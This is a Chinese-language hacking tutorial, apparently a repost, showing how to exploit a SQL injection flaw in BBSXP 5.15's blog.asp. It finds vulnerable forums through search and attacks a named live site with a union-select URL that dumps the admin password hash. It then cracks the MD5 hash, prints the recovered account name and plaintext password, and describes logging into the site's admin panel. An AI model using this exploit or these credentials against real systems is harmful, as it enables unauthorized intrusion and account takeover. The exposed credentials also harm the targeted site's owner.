首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞
漏洞主要出在BLOG.ASP 可以让直接构造数据库命令
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
后台区长的md5密码就显示出来了。
前台密码也可以出来,
网上已经有相关动画,软件。
就利用这个漏洞,肯定有一批bbsxp的网站要倒下了
接下来就是讲工具了,准备好MD5密码破解器
关于md5的破解,比较好使的有md5cracker速度增强版。
1。先用8位或9位数字跑。很快。
2。如果不行,用小写字母跑。选择5-6位比较好。
3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的,
跑上及几个小时。(你的机器配置必须很好)
4。再不行,建议放弃,太变态了。
前台ok...后台密码..(注:你必须知道管理员的帐号)
直接默认的配置就是直接拿下后台密码...
直接吧前台md5密码暴出来。
剩下的事就事破解md5了。
现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作
按照上面工具的介绍先用数字把,
正在破===耐心等等
我接条信息,大家不介意把~
出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。
bBsxp5.15最新漏洞的原始作者不清,来自Guest $得黑客往事黑客网http://www.blogcn.com/user36/156544632/ 【转自世纪安全网 http://www.21safe.com】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)